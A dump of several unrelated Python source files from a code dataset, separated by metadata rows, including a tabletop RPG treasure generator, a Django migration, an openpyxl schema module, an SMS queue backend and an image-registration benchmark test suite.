(60, _gen_coins, ("sp", 5, 6, 0, 100)),
(40, _gen_coins, ("ep", 5, 4, 0, 100)),
(70, _gen_coins, ("gp", 10, 6, 0, 100)),
(50, _gen_coins, ("pp", 1, 10, 0, 100)),
(50, _gen_gems, (6, 6, 0, 1)),
(50, _gen_art, (6, 6, 0, 1)),
(30, _gen_magic, ("Any", 0, 0, 3, 1)),
],
'B': [
(75, _gen_coins, ("cp", 5, 10, 0, 100)),
(50, _gen_coins, ("sp", 5, 6, 0, 100)),
(50, _gen_coins, ("ep", 5, 4, 0, 100)),
(50, _gen_coins, ("gp", 3, 6, 0, 100)),
(25, _gen_gems, (1, 6, 0, 1)),
(25, _gen_art, (1, 6, 0, 1)),
(10, _gen_magic, ("AW", 0, 0, 1, 1)),
],
'C': [
(60, _gen_coins, ("cp", 6, 6, 0, 100)),
(60, _gen_coins, ("sp", 5, 4, 0, 100)),
(30, _gen_coins, ("ep", 2, 6, 0, 100)),
(25, _gen_gems, (1, 4, 0, 1)),
(25, _gen_art, (1, 4, 0, 1)),
(15, _gen_magic, ("Any", 1, 2, 0, 1)),
],
'D': [
(30, _gen_coins, ("cp", 4, 6, 0, 100)),
(45, _gen_coins, ("sp", 6, 6, 0, 100)),
(90, _gen_coins, ("gp", 5, 8, 0, 100)),
(30, _gen_gems, (1, 8, 0, 1)),
(30, _gen_art, (1, 8, 0, 1)),
(20, _gen_magic, [
("Any", 1, 2, 0, 1),
("Potion", 0, 0, 1, 1),
]
),
],
'E': [
(30, _gen_coins, ("cp", 2, 8, 0, 100)),
(60, _gen_coins, ("sp", 6, 10, 0, 100)),
(50, _gen_coins, ("ep", 3, 8, 0, 100)),
(50, _gen_coins, ("gp", 4, 10, 0, 100)),
(10, _gen_gems, (1, 10, 0, 1)),
(10, _gen_art, (1, 10, 0, 1)),
(30, _gen_magic, [
("Any", 1, 4, 0, 1),
("Scroll", 0, 0, 1, 1),
]
),
],
'F': [
(40, _gen_coins, ("sp", 3, 8, 0, 100)),
(50, _gen_coins, ("ep", 4, 8, 0, 100)),
(85, _gen_coins, ("gp", 6, 10, 0, 100)),
(70, _gen_coins, ("pp", 2, 8, 0, 100)),
(20, _gen_gems, (2, 12, 0, 1)),
(20, _gen_art, (1, 12, 0, 1)),
(35, _gen_magic, [
("Non-Weapon", 1, 4, 0, 1),
("Scroll", 0, 0, 1, 1),
("Potion", 0, 0, 1, 1),
]
),
],
'G': [
(90, _gen_coins, ("gp", 4, 6, 0, 1000)),
(75, _gen_coins, ("pp", 5, 8, 0, 100)),
(25, _gen_gems, (3, 6, 0, 1)),
(25, _gen_art, (1, 10, 0, 1)),
(50, _gen_magic, [
("Any", 1, 4, 0, 1),
("Scroll", 0, 0, 1, 1),
]
),
],
'H': [
(75, _gen_coins, ("cp", 8, 10, 0, 100)),
(75, _gen_coins, ("sp", 6, 10, 0, 1000)),
(75, _gen_coins, ("ep", 3, 10, 0, 1000)),
(75, _gen_coins, ("gp", 5, 8, 0, 1000)),
(75, _gen_coins, ("pp", 9, 8, 0, 100)),
(50, _gen_gems, ( 1, 100, 0, 1)),
(50, _gen_art, (10, 4, 0, 1)),
(20, _gen_magic, [
("Any", 1, 4, 0, 1),
("Scroll", 0, 0, 1, 1),
("Potion", 0, 0, 1, 1),
]
),
],
'I': [
(80, _gen_coins, ("pp", 3, 10, 0, 100)),
(50, _gen_gems, (2, 6, 0, 1)),
(50, _gen_art, (2, 6, 0, 1)),
(15, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'J': [
(45, _gen_coins, ("cp", 3, 8, 0, 100)),
(45, _gen_coins, ("sp", 1, 8, 0, 100)),
],
'K': [
(90, _gen_coins, ("cp", 2, 10, 0, 100)),
(35, _gen_coins, ("sp", 1, 8, 0, 100)),
],
'L': [
(50, _gen_gems, (1, 4, 0, 1)),
],
'M': [
(90, _gen_coins, ("gp", 4, 10, 0, 100)),
(90, _gen_coins, ("pp", 2, 8, 0, 1000)),
],
'N': [
(40, _gen_magic, ("Potion", 2, 4, 0, 1)),
],
'O': [
(50, _gen_magic, ("Scroll", 1, 4, 0, 1)),
],
# personal treasure
'P': [
(100, _gen_coins, ("cp", 3, 8, 0, 1)),
],
'Q': [
(100, _gen_coins, ("sp", 3, 6, 0, 1)),
],
'R': [
(100, _gen_coins, ("ep", 2, 6, 0, 1)),
],
'S': [
(100, _gen_coins, ("gp", 2, 4, 0, 1)),
],
'T': [
(100, _gen_coins, ("pp", 1, 6, 0, 1)),
],
'U': [
( 50, _gen_coins, ("cp", 1, 20, 0, 1)),
( 50, _gen_coins, ("sp", 1, 20, 0, 1)),
( 25, _gen_coins, ("gp", 1, 20, 0, 1)),
( 5, _gen_gems, (1, 4, 0, 1)),
( 5, _gen_art, (1, 4, 0, 1)),
( 2, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'V': [
( 25, _gen_coins, ("sp", 1, 20, 0, 1)),
( 25, _gen_coins, ("ep", 1, 20, 0, 1)),
( 50, _gen_coins, ("gp", 1, 20, 0, 1)),
( 25, _gen_coins, ("pp", 1, 20, 0, 1)),
( 10, _gen_gems, (1, 4, 0, 1)),
( 10, _gen_art, (1, 4, 0, 1)),
( 5, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U1': [
( 75, _gen_coins, ("cp", 1, 8, 0, 100)),
( 50, _gen_coins, ("sp", 1, 6, 0, 100)),
( 25, _gen_coins, ("ep", 1, 4, 0, 100)),
( 7, _gen_coins, ("gp", 1, 4, 0, 100)),
( 1, _gen_coins, ("pp", 1, 4, 0, 100)),
( 7, _gen_gems, (1, 4, 0, 1)),
( 3, _gen_art, (1, 4, 0, 1)),
( 2, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U2': [
( 50, _gen_coins, ("cp", 1, 10, 0, 100)),
( 50, _gen_coins, ("sp", 1, 8, 0, 100)),
( 25, _gen_coins, ("ep", 1, 6, 0, 100)),
( 20, _gen_coins, ("gp", 1, 6, 0, 100)),
( 2, _gen_coins, ("pp", 1, 4, 0, 100)),
( 10, _gen_gems, (1, 6, 0, 1)),
( 7, _gen_art, (1, 4, 0, 1)),
( 5, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U3': [
( 30, _gen_coins, ("cp", 2, 6, 0, 100)),
( 50, _gen_coins, ("sp", 1, 10, 0, 100)),
( 25, _gen_coins, ("ep", 1, 8, 0, 100)),
( 50, _gen_coins, ("gp", 1, 6, 0, 100)),
( 4, _gen_coins, ("pp", 1, 4, 0, 100)),
( 15, _gen_gems, (1, 6, 0, 1)),
( 7, _gen_art, (1, 6, 0, 1)),
( 8, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U45': [
( 20, _gen_coins, ("cp", 3, 6, 0, 100)),
( 50, _gen_coins, ("sp", 2, 6, 0, 100)),
( 25, _gen_coins, ("ep", 1, 10, 0, 100)),
( 50, _gen_coins, ("gp", 2, 6, 0, 100)),
( 8, _gen_coins, ("pp", 1, 4, 0, 100)),
( 20, _gen_gems, (1, 8, 0, 1)),
( 10, _gen_art, (1, 6, 0, 1)),
( 12, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U67': [
( 15, _gen_coins, ("cp", 4, 6, 0, 100)),
( 50, _gen_coins, ("sp", 3, 6, 0, 100)),
( 25, _gen_coins, ("ep", 1, 12, 0, 100)),
( 70, _gen_coins, ("gp", 2, 8, 0, 100)),
( 15, _gen_coins, ("pp", 1, 4, 0, 100)),
( 30, _gen_gems, (1, 8, 0, 1)),
( 15, _gen_art, (1, 6, 0, 1)),
( 16, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U8': [
( 10, _gen_coins, ("cp", 5, 6, 0, 100)),
( 50, _gen_coins, ("sp", 5, 6, 0, 100)),
( 25, _gen_coins, ("ep", 2, 8, 0, 100)),
( 75, _gen_coins, ("gp", 4, 6, 0, 100)),
( 30, _gen_coins, ("pp", 1, 4, 0, 100)),
( 40, _gen_gems, (1, 8, 0, 1)),
( 30, _gen_art, (1, 8, 0, 1)),
( 20, _gen_magic, ("Any", 0, 0, 1, 1)),
],
# coinage
'cp': [
(100, _gen_coins, ("cp", 0, 0, 1, 1)),
],
'sp': [
(100, _gen_coins, ("sp", 0, 0, 1, 1)),
],
'ep': [
(100, _gen_coins, ("ep", 0, 0, 1, 1)),
],
'gp': [
(100, _gen_coins, ("gp", 0, 0, 1, 1)),
],
'pp': [
(100, _gen_coins, ("pp", 0, 0, 1, 1)),
],
# magic classes
'MAGIC': [ (100, _gen_magic, ("Any", 0, 0, 1, 1)), ],
'POTION': [ (100, _gen_magic, ("Potion", 0, 0, 1, 1)), ],
'SCROLL': [ (100, _gen_magic, ("Scroll", 0, 0, 1, 1)), ],
'RING': [ (100, _gen_magic, ("Ring", 0, 0, 1, 1)), ],
'WSR': [ (100, _gen_magic, ("WSR", 0, 0, 1, 1)), ],
'MISC': [ (100, _gen_magic, ("Misc", 0, 0, 1, 1)), ],
'ARMOR': [ (100, _gen_magic, ("Armor", 0, 0, 1, 1)), ],
'WEAPON': [ (100, _gen_magic, ("Weapon", 0, 0, 1, 1)), ],
}
_treasure_table['U4'] = _treasure_table['U45']
_treasure_table['U5'] = _treasure_table['U45']
_treasure_table['U6'] = _treasure_table['U67']
_treasure_table['U7'] = _treasure_table['U67']
def Types():
types = _treasure_table.keys()
ones = filter(lambda x: len(x) == 1, types)
mults = filter(lambda x: len(x) > 1, types)
ones.sort()
mults.sort()
return ones + mults
def Treasure(typ):
tr = []
try:
tbl = _treasure_table[string.upper(typ)]
for i in tbl:
if Dice.D(1, 100, 0) <= i[0]:
tr = tr + i[1](i[2])
except:
tr = [ Unknown.Unknown(typ) ]
return tr
def Factory(args):
types = []
tr = []
mult = 1
for i in args:
if type(i) is tuple:
i = Dice.D(*i)
try:
nmult = int(i)
mult = nmult
types.append("%d" % mult)
continue
except:
pass
types.append(i + ",")
for n in range(mult):
tr += Treasure(i)
types = string.join(types, " ")
if types[-1] == ',':
types = types[:-1]
return (types.upper(), combine(tr))
if __name__ == "__main__":
import sys
if len(sys.argv) < 2:
print "Usage: Treasure.py treasuretype [ treasuretype ... ]"
sys.exit(0)
types, tr = Factory(sys.argv[1:])
print "Treasure Type " + string.upper(types)
vtot = 0.0
ocat = ''
qty_len = 1
for t in tr:
qty_len = max(len(str(t.qty)), qty_len)
qty_fmt = "%" + str(qty_len) + "d"
for t in tr:
if t.cat != ocat:
print t.cat
ocat = t.cat
if t.value != 0:
print " ", qty_fmt % t.qty, t.name, t.value, "GP ea.", \
t.value * t.qty, "GP total"
else:
print " ", qty_fmt % t.qty, t.name
for i in t.desc:
print " ", i
vtot = vtot + (t.qty * t.value)
print "----- Total Value", vtot, "GP\n"
# end of script.
| 32.734411 | 79 | 0.417172 | 1,945 | 14,174 | 2.862211 | 0.143959 | 0.122148 | 0.016167 | 0.021556 | 0.447638 | 0.397341 | 0.288126 | 0.146937 | 0.130771 | 0.126639 | 0 | 0.129187 | 0.380697 | 14,174 | 432 | 80 | 32.810185 | 0.505013 | 0.113729 | 0 | 0.250704 | 0 | 0 | 0.044554 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002817 | 0.011268 | null | null | 0.019718 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1be38ec637c07219a45f7c7ba15326a16a343d58 | 396 | py | Python | T2API/migrations/0008_product_weight.py | hackhb18-T2/api | c42be466492d07d6451ff3145985cd8cc0927257 | [
"Apache-2.0"
] | null | null | null | T2API/migrations/0008_product_weight.py | hackhb18-T2/api | c42be466492d07d6451ff3145985cd8cc0927257 | [
"Apache-2.0"
] | null | null | null | T2API/migrations/0008_product_weight.py | hackhb18-T2/api | c42be466492d07d6451ff3145985cd8cc0927257 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.0.2 on 2018-02-17 10:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('T2API', '0007_apiuser_deviceuser'),
]
operations = [
migrations.AddField(
model_name='product',
name='weight',
field=models.IntegerField(default=None, null=True),
),
]
| 20.842105 | 63 | 0.60101 | 42 | 396 | 5.595238 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070423 | 0.282828 | 396 | 18 | 64 | 22 | 0.757042 | 0.113636 | 0 | 0 | 1 | 0 | 0.117479 | 0.065903 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1be5b77cc2bbea8d65329992b137d52e24f4e227 | 441 | py | Python | changes/api/build_coverage.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 443 | 2015-01-03T16:28:39.000Z | 2021-04-26T16:39:46.000Z | changes/api/build_coverage.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 12 | 2015-07-30T19:07:16.000Z | 2016-11-07T23:11:21.000Z | changes/api/build_coverage.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 47 | 2015-01-09T10:04:00.000Z | 2020-11-18T17:58:19.000Z | from changes.api.base import APIView
from changes.lib.coverage import get_coverage_by_build_id, merged_coverage_data
from changes.models.build import Build
class BuildTestCoverageAPIView(APIView):
def get(self, build_id):
build = Build.query.get(build_id)
if build is None:
return '', 404
coverage = merged_coverage_data(get_coverage_by_build_id(build.id))
return self.respond(coverage)
| 25.941176 | 79 | 0.730159 | 60 | 441 | 5.133333 | 0.433333 | 0.113636 | 0.084416 | 0.116883 | 0.12987 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008475 | 0.197279 | 441 | 16 | 80 | 27.5625 | 0.861582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1beb0ef06d9c6f7de745f499f7af1a9f705e4a88 | 929 | py | Python | sendsms/backends/rq.py | this-is-the-bard/django-sendsms | 8944b7d276f91b019ad6aa2e7e29324fa107fa01 | [
"MIT"
] | null | null | null | sendsms/backends/rq.py | this-is-the-bard/django-sendsms | 8944b7d276f91b019ad6aa2e7e29324fa107fa01 | [
"MIT"
] | null | null | null | sendsms/backends/rq.py | this-is-the-bard/django-sendsms | 8944b7d276f91b019ad6aa2e7e29324fa107fa01 | [
"MIT"
] | null | null | null | """ python-rq based backend
This backend will send your messages asynchronously with python-rq.
Before using this backend, make sure that django-rq is installed and
configured.
Usage
-----
In settings.py
SENDSMS_BACKEND = 'sendsms.backends.rq.SmsBackend'
RQ_SENDSMS_BACKEND = 'actual.backend.to.use.SmsBackend'
"""
from sendsms.api import get_connection
from sendsms.backends.base import BaseSmsBackend
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django_rq import job
RQ_SENDSMS_BACKEND = getattr(settings, 'RQ_SENDSMS_BACKEND', None)
if not RQ_SENDSMS_BACKEND:
raise ImproperlyConfigured('Set RQ_SENDSMS_BACKEND')
@job
def send_messages(messages):
connection = get_connection(RQ_SENDSMS_BACKEND)
connection.send_messages(messages)
class SmsBackend(BaseSmsBackend):
def send_messages(self, messages):
send_messages.delay(messages)
| 22.119048 | 68 | 0.787944 | 120 | 929 | 5.933333 | 0.441667 | 0.13764 | 0.134831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137783 | 929 | 41 | 69 | 22.658537 | 0.888889 | 0.344456 | 0 | 0 | 0 | 0 | 0.066778 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.333333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1bed3f78be12183f03bd98f78582fb16d8457339 | 2,435 | py | Python | venv/Lib/site-packages/openpyxl/worksheet/errors.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | venv/Lib/site-packages/openpyxl/worksheet/errors.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | venv/Lib/site-packages/openpyxl/worksheet/errors.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | #Autogenerated schema
from openpyxl.descriptors.serialisable import Serialisable
from openpyxl.descriptors import (
Typed,
String,
Bool,
Sequence,
)
from openpyxl.descriptors.excel import CellRange
class Extension(Serialisable):
tagname = "extension"
uri = String(allow_none=True)
def __init__(self,
uri=None,
):
self.uri = uri
class ExtensionList(Serialisable):
tagname = "extensionList"
# uses element group EG_ExtensionList
ext = Sequence(expected_type=Extension)
__elements__ = ('ext',)
def __init__(self,
ext=(),
):
self.ext = ext
class IgnoredError(Serialisable):
tagname = "ignoredError"
sqref = CellRange
evalError = Bool(allow_none=True)
twoDigitTextYear = Bool(allow_none=True)
numberStoredAsText = Bool(allow_none=True)
formula = Bool(allow_none=True)
formulaRange = Bool(allow_none=True)
unlockedFormula = Bool(allow_none=True)
emptyCellReference = Bool(allow_none=True)
listDataValidation = Bool(allow_none=True)
calculatedColumn = Bool(allow_none=True)
def __init__(self,
sqref=None,
evalError=False,
twoDigitTextYear=False,
numberStoredAsText=False,
formula=False,
formulaRange=False,
unlockedFormula=False,
emptyCellReference=False,
listDataValidation=False,
calculatedColumn=False,
):
self.sqref = sqref
self.evalError = evalError
self.twoDigitTextYear = twoDigitTextYear
self.numberStoredAsText = numberStoredAsText
self.formula = formula
self.formulaRange = formulaRange
self.unlockedFormula = unlockedFormula
self.emptyCellReference = emptyCellReference
self.listDataValidation = listDataValidation
self.calculatedColumn = calculatedColumn
class IgnoredErrors(Serialisable):
tagname = "ignoredErrors"
ignoredError = Sequence(expected_type=IgnoredError)
extLst = Typed(expected_type=ExtensionList, allow_none=True)
__elements__ = ('ignoredError', 'extLst')
def __init__(self,
ignoredError=(),
extLst=None,
):
self.ignoredError = ignoredError
self.extLst = extLst
| 25.904255 | 64 | 0.631622 | 202 | 2,435 | 7.420792 | 0.227723 | 0.066044 | 0.095397 | 0.102068 | 0.032021 | 0.032021 | 0 | 0 | 0 | 0 | 0 | 0 | 0.293635 | 2,435 | 93 | 65 | 26.182796 | 0.871512 | 0.022998 | 0 | 0.117647 | 1 | 0 | 0.02862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.044118 | 0 | 0.455882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1beeb9bf708d482300442a926d31325bbdca0e33 | 619 | py | Python | SmartMove/SmartConnector/cpapi/utils.py | themichaelasher/SmartMove | 074c6e1a854fdfc21fb292e575a869719d56c5d5 | [
"Apache-2.0"
] | 24 | 2018-03-15T09:00:51.000Z | 2022-03-17T05:19:47.000Z | SmartMove/SmartConnector/cpapi/utils.py | themichaelasher/SmartMove | 074c6e1a854fdfc21fb292e575a869719d56c5d5 | [
"Apache-2.0"
] | 8 | 2020-01-20T15:44:42.000Z | 2021-10-18T05:39:04.000Z | SmartMove/SmartConnector/cpapi/utils.py | themichaelasher/SmartMove | 074c6e1a854fdfc21fb292e575a869719d56c5d5 | [
"Apache-2.0"
] | 22 | 2018-06-04T20:36:41.000Z | 2022-03-16T17:10:44.000Z | import json
import sys
def compatible_loads(json_data):
"""
Function json.loads in python 3.0 - 3.5 can't handle bytes, so this function handle it.
:param json_data:
:return: unicode (str if it's python 3)
"""
if isinstance(json_data, bytes) and (3, 0) <= sys.version_info < (3, 6):
json_data = json_data.decode("utf-8")
return json.loads(json_data)
def get_massage_from_io_error(error):
"""
:param: IOError
:return: error message
"""
if sys.version_info >= (3, 0):
return error.strerror
else:
return error.message
| 24.76 | 92 | 0.610662 | 88 | 619 | 4.147727 | 0.488636 | 0.131507 | 0.071233 | 0.082192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026786 | 0.276252 | 619 | 24 | 93 | 25.791667 | 0.787946 | 0.297254 | 0 | 0 | 0 | 0 | 0.013587 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1bef7a1aa389a58d40ce648d1ed75a0579e889d3 | 8,752 | py | Python | tests/test_benchmark.py | fossabot/BIRL | 62e91523ac5797a13a7b78b9869ccfdf61cc60d8 | [
"BSD-3-Clause"
] | null | null | null | tests/test_benchmark.py | fossabot/BIRL | 62e91523ac5797a13a7b78b9869ccfdf61cc60d8 | [
"BSD-3-Clause"
] | null | null | null | tests/test_benchmark.py | fossabot/BIRL | 62e91523ac5797a13a7b78b9869ccfdf61cc60d8 | [
"BSD-3-Clause"
] | null | null | null | """
Testing default benchmarks in single thred and parallel configuration
Check whether it generates correct outputs and resulting values
Copyright (C) 2017-2019 Jiri Borovec <jiri.borovec@fel.cvut.cz>
"""
import argparse
import logging
import os
import shutil
import sys
import unittest
try: # python 3
from unittest.mock import patch
except ImportError: # python 2
from mock import patch
import numpy as np
import pandas as pd
from numpy.testing import assert_raises, assert_array_almost_equal
sys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root
from birl.utilities.data_io import update_path, save_config_yaml
from birl.utilities.dataset import args_expand_parse_images
from birl.utilities.experiments import parse_arg_params, try_decorator
from birl.benchmark import ImRegBenchmark
from birl.bm_template import BmTemplate
PATH_ROOT = os.path.dirname(update_path('birl'))
PATH_DATA = update_path('data-images')
PATH_CSV_COVER_MIX = os.path.join(PATH_DATA, 'pairs-imgs-lnds_mix.csv')
PATH_CSV_COVER_ANHIR = os.path.join(PATH_DATA, 'pairs-imgs-lnds_histol.csv')
# logging.basicConfig(level=logging.INFO)
class TestBmRegistration(unittest.TestCase):
@classmethod
def setUpClass(cls):
logging.basicConfig(level=logging.INFO)
cls.path_out = os.path.join(PATH_ROOT, 'output-testing')
shutil.rmtree(cls.path_out, ignore_errors=True)
os.mkdir(cls.path_out)
def _remove_default_experiment(self, bm_name):
path_expt = os.path.join(self.path_out, bm_name)
shutil.rmtree(path_expt, ignore_errors=True)
@classmethod
def test_benchmark_invalid_inputs(self):
# test missing some parameters
params = {
'path_table': 'x',
'path_out': 'x',
'nb_workers': 0,
'unique': False,
}
# try a missing params
for miss in ['path_table', 'path_out', 'unique']:
params_miss = params.copy()
del params_miss[miss]
assert_raises(AssertionError, ImRegBenchmark, params_miss)
# not defined output folder
assert_raises(Exception, ImRegBenchmark, params)
def test_benchmark_failing(self):
""" test run in parallel with failing experiment """
params = {
'path_table': PATH_CSV_COVER_MIX,
'path_dataset': PATH_DATA,
'path_out': self.path_out,
'preprocessing': 'nothing',
'nb_workers': 4,
'visual': True,
'unique': True,
}
benchmark = ImRegBenchmark(params)
benchmark.run()
# no landmarks was copy and also no experiment results was produced
list_csv = [
len([csv for csv in files if os.path.splitext(csv)[-1] == '.csv'])
for _, _, files in os.walk(benchmark.params['path_exp'])
]
self.assertEqual(sum(list_csv), 0)
del benchmark
def test_benchmark_parallel(self):
""" test run in parallel (2 threads) """
self._remove_default_experiment(ImRegBenchmark.__name__)
params = {
'path_table': PATH_CSV_COVER_MIX,
'path_out': self.path_out,
'preprocessing': ['gray', 'matching-rgb'],
'nb_workers': 2,
'visual': True,
'unique': False,
}
benchmark = ImRegBenchmark(params)
# run it for the first time, complete experiment
benchmark.run()
# rerun experiment simulated repeating unfinished benchmarks
benchmark.run()
self.check_benchmark_results(benchmark, final_means=[0., 0., 0., 0., 0.], final_stds=[0., 0., 0., 0., 0.])
del benchmark
def test_benchmark_simple(self):
""" test run in sequence (1 thread) """
self._remove_default_experiment(ImRegBenchmark.__name__)
params = {
'path_table': PATH_CSV_COVER_ANHIR,
'path_dataset': PATH_DATA,
'path_out': self.path_out,
'preprocessing': ['matching-hsv', 'gray'],
'nb_workers': 1,
'visual': True,
'unique': False,
}
benchmark = ImRegBenchmark(params)
benchmark.run()
self.check_benchmark_results(benchmark, final_means=[0., 0.], final_stds=[0., 0.])
del benchmark
def test_benchmark_template(self):
""" test run in single thread """
path_config = os.path.join(self.path_out, 'sample_config.yaml')
save_config_yaml(path_config, {})
params = {
'path_table': PATH_CSV_COVER_MIX,
'path_out': self.path_out,
'path_config': path_config,
'nb_workers': 2,
'unique': False,
'visual': True,
}
benchmark = BmTemplate(params)
benchmark.run()
self.check_benchmark_results(
benchmark, final_means=[28., 68., 73., 76., 95.], final_stds=[1., 13., 28., 28., 34.]
)
os.remove(path_config)
del benchmark
def check_benchmark_results(self, benchmark, final_means, final_stds):
""" check whether the benchmark folder contains all required files
and compute statistic correctly """
bm_name = benchmark.__class__.__name__
path_bm = os.path.join(self.path_out, bm_name)
self.assertTrue(os.path.exists(path_bm), msg='Missing benchmark: %s' % bm_name)
# required output files
for file_name in [
benchmark.NAME_CSV_REGISTRATION_PAIRS, benchmark.NAME_RESULTS_CSV, benchmark.NAME_RESULTS_TXT
]:
self.assertTrue(
os.path.isfile(os.path.join(path_bm, file_name)),
msg='Missing "%s" file in the BM experiment' % file_name
)
# load registration file
path_csv = os.path.join(path_bm, benchmark.NAME_CSV_REGISTRATION_PAIRS)
df_regist = pd.read_csv(path_csv, index_col=0)
# only two items in the benchmark
self.assertEqual(
len(df_regist),
len(benchmark._df_overview),
msg='Found only %i records instead of %i' % (len(df_regist), len(benchmark._df_overview))
)
# test presence of particular columns
for col in list(benchmark.COVER_COLUMNS) + [benchmark.COL_IMAGE_MOVE_WARP]:
self.assertIn(col, df_regist.columns, msg='Missing column "%s" in result table' % col)
cols_lnds_warp = [
col in df_regist.columns for col in [benchmark.COL_POINTS_REF_WARP, benchmark.COL_POINTS_MOVE_WARP]
]
self.assertTrue(any(cols_lnds_warp), msg='Missing any column of warped landmarks')
col_lnds_warp = benchmark.COL_POINTS_REF_WARP if cols_lnds_warp[0] \
else benchmark.COL_POINTS_MOVE_WARP
# check existence of all mentioned files
for _, row in df_regist.iterrows():
self.assertTrue(
os.path.isfile(os.path.join(path_bm, row[benchmark.COL_IMAGE_MOVE_WARP])),
msg='Missing image "%s"' % row[benchmark.COL_IMAGE_MOVE_WARP]
)
self.assertTrue(
os.path.isfile(os.path.join(path_bm, row[col_lnds_warp])),
msg='Missing landmarks "%s"' % row[col_lnds_warp]
)
# check existence of statistical results
for stat_name in ['Mean', 'STD', 'Median', 'Min', 'Max']:
self.assertTrue(
any(stat_name in col for col in df_regist.columns), msg='Missing statistics "%s"' % stat_name
)
# test specific results
assert_array_almost_equal(sorted(df_regist['TRE Mean'].values), np.array(final_means), decimal=0)
assert_array_almost_equal(sorted(df_regist['TRE STD'].values), np.array(final_stds), decimal=0)
def test_try_wrap(self):
self.assertIsNone(try_wrap())
def test_argparse(self):
with patch('argparse._sys.argv', ['script.py']):
args = parse_arg_params(argparse.ArgumentParser())
self.assertIsInstance(args, dict)
def test_argparse_images(self):
with patch('argparse._sys.argv', ['script.py', '-i', 'an_image.png']):
args = args_expand_parse_images(argparse.ArgumentParser())
self.assertIsInstance(args, dict)
def test_fail_visual(self):
fig = ImRegBenchmark._visual_image_move_warp_lnds_move_warp({ImRegBenchmark.COL_POINTS_MOVE_WARP: 'abc'})
self.assertIsNone(fig)
fig = ImRegBenchmark._visual_image_move_warp_lnds_ref_warp({ImRegBenchmark.COL_POINTS_REF_WARP: 'abc'})
self.assertIsNone(fig)
fig = ImRegBenchmark.visualise_registration((0, {}))
self.assertIsNone(fig)
@try_decorator
def try_wrap():
return '%i' % '42'
